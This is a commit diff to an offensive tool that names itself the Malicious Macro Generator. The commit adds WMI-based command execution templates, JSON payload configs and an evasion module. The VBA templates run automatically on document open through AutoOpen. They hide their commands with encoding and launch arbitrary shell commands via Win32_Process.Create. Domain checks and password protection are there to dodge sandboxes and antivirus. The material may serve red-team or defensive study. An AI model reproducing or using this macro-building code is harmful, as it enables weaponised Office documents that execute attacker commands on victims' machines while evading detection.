Added WMI support

README.md

@@ -5,20 +5,21 @@ Simple utility design to generate obfuscated macro that also include a AV / Sand
 #Requirement
 ```
 Python 2.7
-Python 3.4 (Not supported yet)
 ```
 
 #Usage
 ```
 MMG.Malicious Macro Generator v2.0 - RingZer0 Team
-Author: Mr.Un1k0d3r mr.un1k0d3r@gmail.com
+Author: Mr.Un1k0d3r
 
-Usage: MMG.py [config] [output]
+Usage: MMG.py [config] [output] (optional -list)
 
         config  Config file that contain generator information
         output  Output filename for the macro
+        -list   List all available payloads and evasion techniques
+
         
-python MMG.py configs/genric-cmd.json malicious.vba
+python MMG.py configs/generic-cmd.json malicious.vba
 ```
 
 #Config file
@@ -53,7 +54,7 @@ The macro is looking for the total disk space. VMs and test machines use small d
 
 The macro is looking for the total memory size. Vms and test machines use less resources.
 
-######  Uptime check
+###### Uptime check
 
 The macro is looking for the system uptime. Sandboxes will return a short uptime.
 
@@ -67,5 +68,4 @@ The python script will also generate obfuscated code to avoid heuristic detectio
 Mr.Un1k0d3r RingZer0 Team
 
 https://ringzer0team.com
-charles.hamilton@mandiant.com
 

configs/wmi-cmd-evasion.json

@@ -0,0 +1,14 @@
+{
+	"description": "Command exec payload using WMI Win32_Process class\nEvasion technique set to domain check",
+	"template": "templates/payloads/wmi-cmd-evasion-template.vba",
+	"varcount": 150,
+	"encodingoffset": 4,
+	"chunksize": 200,
+	"encodedvars": 	{
+				"DOMAIN":"RINGZER0"
+			},
+	"vars": 	[],
+	"evasion": 	["encoder", "domain"],
+	"payload": "cmd.exe /c whoami"
+}
+

configs/wmi-cmd.json

@@ -0,0 +1,12 @@
+{
+	"description": "Command exec payload using WMI Win32_Process class\nEvasion technique set to none",
+	"template": "templates/payloads/wmi-cmd-template.vba",
+	"varcount": 150,
+	"encodingoffset": 4,
+	"chunksize": 200,
+	"encodedvars": 	{},
+	"vars": 	[],
+	"evasion": 	["encoder"],
+	"payload": "cmd.exe /c your payload"
+}
+

lib/helper.py

@@ -1,5 +1,6 @@
 import json
 import os
+import glob
 
 class Helper:
     VERSION = "2.0"
@@ -11,12 +12,16 @@ class Helper:
         self.config = {}
     
     def ValidateArgv(self):
+        if "-list" in self.argv:
+            self.ListModules()
+            exit(0)
+        
         if len(self.argv) < 3:
             self.HelpMenu()
             self.ExitShowError("Missing arguments.")
             
     def HelpMenu(self):
-        print "Usage: %s [config] [output]\n\n\tconfig\tConfig file that contain generator information\n\toutput\tOutput filename for the macro" % self.argv[0]
+        print "Usage: %s [config] [output] (optional -list)\n\n\tconfig\tConfig file that contain generator information\n\toutput\tOutput filename for the macro\n\t-list\tList all available payloads and evasion techniques" % self.argv[0]
         
     def Banner(self):
         print "MMG.Malicious Macro Generator v%s - RingZer0 Team\nAuthor: Mr.Un1k0d3r mr.un1k0d3r@gmail.com\n" % Helper.VERSION
@@ -63,4 +68,21 @@ class Helper:
         except:
             self.ExitShowError("Failed to save \"%s\"." % filename)
         self.PrintSuccess("\"%s\" successfully saved to the disk." % filename)
-        return self
+        return self
+    
+    def ListModules(self):
+        path = os.path.dirname(os.path.realpath(__file__))
+        payloadPath = path + "/../templates/payloads/"
+        evasionPath = path + "/../templates/evasions/"
+        
+        self.PrintSuccess("List of available payloads")
+        self.GlobFolder(payloadPath)
+        
+        print "\n"
+        self.PrintSuccess("List of available evasion techniques")
+        self.GlobFolder(evasionPath)
+            
+    def GlobFolder(self, path):
+        for file in glob.glob(path + "*"):
+            print "\t" + file.replace(path, "")
+        

templates/evasions/password.vba

@@ -0,0 +1,10 @@
+[use:password_protect]
+
+Function password_protect(password_protect1 As String) As String
+	Dim password_protect2 As String
+	password_protect2 = "data1"
+	ActiveDocument.Password = decode(password_protect2)
+	password_protect2 = "data2"
+	ActiveDocument.Save
+	password_protect = password_protect2
+End Function

templates/payloads/wmi-cmd-evasion-template.vba

@@ -0,0 +1,47 @@
+[use:payload_wrapper]
+[use:exec]
+[use:init_wmi]
+
+Sub AutoOpen()
+	Dim var1 As String
+	Dim var2 As Object
+	Dim var3 As Integer
+	Dim var4 As String
+	Dim var5 as String
+	
+	var3 = [int1]
+	var1 = func_evasion_domain()
+	If (var1 = "bool1") Then 
+		var5 = init_wmi("data1")
+		Set var2 = GetObject(var5)
+		var4 = payload_wrapper("data1")
+		var4 = exec(var2, var4, var3)
+	End If
+End Sub
+
+Function payload_wrapper(payload_wrapper1 As String) As String
+	Dim payload_wrapper2 As String
+	[payload]
+	payload_wrapper2 = [payload_args]
+	payload_wrapper2 = decode(payload_wrapper2)
+	payload_wrapper = payload_wrapper2
+End Function
+
+Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
+	Dim exec4 As String
+	Dim exec5 As Integer
+	exec5 = [smallint1]
+	exec4 = exec2
+    If (exec3 > exec5) Then
+		exec5 = exec3 - exec3
+		exec1.Create(exec4)
+	End If
+	exec4 = "exec6"
+	exec = exec4
+End Function
+
+Function init_wmi(init_wmi1 As String) As String
+	Dim init_wmi2 As String
+	init_wmi2 = decode("{[winmgmts:Win32_Process]}")
+    init_wmi = init_wmi2
+End Function

templates/payloads/wmi-cmd-template.vba

@@ -0,0 +1,45 @@
+[use:payload_wrapper]
+[use:exec]
+[use:init_wmi]
+
+Sub AutoOpen()
+	Dim var1 As String
+	Dim var2 As Object
+	Dim var3 As Integer
+	Dim var4 As String
+	Dim var5 as String
+	
+	var3 = [int1]
+	var1 = "{[Wscript.Shell]}"
+	var5 = init_wmi("data1")
+	Set var2 = GetObject(var5)
+	var4 = payload_wrapper("data1")
+	var4 = exec(var2, var4, var3)
+End Sub
+
+Function payload_wrapper(payload_wrapper1 As String) As String
+	Dim payload_wrapper2 As String
+	[payload]
+	payload_wrapper2 = [payload_args]
+	payload_wrapper2 = decode(payload_wrapper2)
+	payload_wrapper = payload_wrapper2
+End Function
+
+Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
+	Dim exec4 As String
+	Dim exec5 As Integer
+	exec5 = [smallint1]
+	exec4 = exec2
+    If (exec3 > exec5) Then
+		exec5 = exec3 - exec3
+		exec1.Create(exec4)
+	End If
+	exec4 = "exec6"
+	exec = exec4
+End Function
+
+Function init_wmi(init_wmi1 As String) As String
+	Dim init_wmi2 As String
+	init_wmi2 = decode("{[winmgmts:Win32_Process]}")
+    init_wmi = init_wmi2
+End Function